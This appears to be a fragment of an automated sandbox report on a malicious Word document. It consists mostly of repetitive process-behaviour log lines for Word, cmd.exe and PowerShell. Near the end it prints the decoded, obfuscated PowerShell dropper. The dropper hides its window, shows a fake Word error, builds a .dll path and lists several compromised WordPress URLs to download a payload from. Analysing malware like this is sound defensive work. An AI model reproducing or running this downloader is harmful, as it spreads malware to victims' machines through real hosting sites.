KAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKJump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKJump to behavior
